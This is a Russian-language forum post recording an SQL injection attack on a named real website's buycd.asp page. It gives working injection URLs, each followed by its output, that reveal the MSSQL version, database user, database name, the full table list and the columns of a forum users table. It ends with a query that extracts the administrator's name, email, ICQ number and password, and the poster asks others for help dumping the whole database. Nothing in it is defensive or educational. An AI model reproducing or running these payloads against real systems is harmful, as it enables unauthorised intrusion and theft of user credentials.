www.g-play.ru
Подозрение на инъекцию:
http://www.g-play.ru/buycd.asp?code=1'
MSSQL
Узнаем версию:
http://www.g-play.ru/buycd.asp?code=1%20or%201=@@version--
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
Узнаем юзера:
http://www.g-play.ru/buycd.asp?code=1%20or%201=(select%20system_user)--
g-play4
Узнаем имя базы:
http://www.g-play.ru/buycd.asp?code=1%20or%201=(select%20db_name())--
g-play
Смотрим таблицы:
http://www.g-play.ru/buycd.asp?code=1+or+1=(select+top+1+table_name+fro m+information_schema.tables)--
и т.д. В итоге:
T_Countrys_R
A_Category
A_HardReviews
A_Price
dtproperties
G_Вопросы
G_Закачки
G_Новости
G_Проекты
G_Сотрудники
G_Ссылки
G_ТемыВопросов
G_Услуги
sysconstraints
T_Anketa
T_BusinessDopOrel
T_BusinessMainOrel
T_BusinessTula
T_Countrys_I
T_Entries_GPLAY
T_Forums_GPLAY
T_Forums_Users
T_PersonalTula
T_PrivateOrel
T_Rate
T_Towns_I
T_Towns_R
Z_News
Z_Texts
Z_Uchastok
Т_Автор
Т_Афоризмы
Т_ЖанрИгры
Т_Игры
Т_Закачки
Т_Изготовитель
Т_Мнения
Т_Новости
Т_Описания
Т_Процессор
Т_Публикатор
Т_Разделы
Т_Скриншоты
Т_Ссылки
Т_СсылкиТел
Т_ЧитКоды
Заинтересовала таблица 'T_Forums_Users'. Смотрим столбцы.
http://www.g-play.ru/buycd.asp?code=1+or+1=(select+top+1+column_name+fr om+information_schema.columns+where+table_name='T_ Forums_Users')--
и т.д. В итоге:
userid
UserName
UserEMail
Location
Occupation
URL
Interests
ICQnum
Signature
ShowEMail
Password
ActiveUser
StorePassword
CloseUser
Итак, вот что мы имеем (а именно - администратора):
http://www.g-play.ru/buycd.asp?code=1+or+1=(select+top+1+cast(UserName+ as+nvarchar)%2B%27%3A%27%2Bcast(UserEMail+as+nvarc har)%2B%27%3A%27%2Bcast(ICQnum+as+nvarchar)%2B%27% 3A%27%2Bcast(Password+as+nvarchar)+from+T_Forums_U sers+where+userid=1)--
Ребят, хочется сдампить базу, помогите. Понимаю, что элементарно, только вот php только хотел начать изучать.. В пм если можно..